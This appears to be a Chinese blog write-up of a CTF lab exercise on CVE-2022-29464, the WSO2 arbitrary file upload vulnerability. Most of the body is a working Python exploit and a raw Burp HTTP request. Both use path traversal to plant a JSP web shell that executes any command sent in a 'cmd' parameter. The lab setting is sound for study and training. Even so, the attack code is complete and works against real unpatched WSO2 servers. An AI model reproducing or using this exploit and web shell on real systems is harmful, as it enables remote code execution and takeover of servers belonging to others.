春秋云镜CVE-2022-29464 (WSO2文件上传漏洞)

合集 - 网络安全(24)
1.SQL注入2.XSS漏洞3.文件上传漏洞4.CSRF漏洞5.SSRF漏洞6.文件包含漏洞7.代码执行命令8.命令执行漏洞9.变量覆盖漏洞10.代码审计笔记11.业务逻辑漏洞12.SRC-漏洞应急响应平台13.信息收集14.反序列化漏洞15.中间件安全16.等级保护基本要求17.应急响应简介18.框架漏洞-RCE19.dc-2靶机20.GOBY联合AWVS21.GOBY联合XRAY
22.春秋云镜CVE-2022-29464 (WSO2文件上传漏洞)
23.春秋云镜CVE-2022-28525(ED01-CMS v20180505 存在任意文件上传漏洞)24.春秋云镜CVE-2022-28512
收起

目录

一:访问靶机:

2:根据提示知道可以文件上传

3:两个方法

一:访问靶机:

2:根据提示知道可以文件上传

3:我们两个方法
1:使用EXP
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = input("请输入URL:")
file = "shell.jsp"
payload = """



<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } catch(IOException e) { e.printStackTrace(); } } %> 
<%=output %>
"""

files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")

直接访问。拿到flag

2:使用burp抓包修改参数

poc
POST /fileupload/toolsAny HTTP/1.1
Host: eci-2ze2knq7i9q2kvy9rhta.cloudeci1.ichunqiu.com:9443
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 901
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"

<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } catch(IOException e) { e.printStackTrace(); } } %> 
<%=output %>
 --4ef9f369a86bfaadf5ec3177278d49c0-- ![](https://img2024.cnblogs.com/blog/3511389/202409/3511389-20240902085822368-330486759.png)




__EOF__

本文作者Crushz
本文链接https://www.cnblogs.com/Crushz-2024/p/18392108.html
关于博主:Crushz
版权声明:转载请注明来源哟~ QAQ
声援博主:UP UP UP !!!
posted @   Crushz  阅读(104)  评论(0编辑  收藏  举报
相关博文:
· 春秋云镜CVE-2022-28525(ED01-CMS v20180505 存在任意文件上传漏洞)
· 文件上传漏洞
· 春秋云镜已做题目のWP
· 春秋云镜 - CVE-2022-29464
· WSO2文件上传漏洞(CVE-2022-29464)
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)
点击右上角即可分享
微信分享提示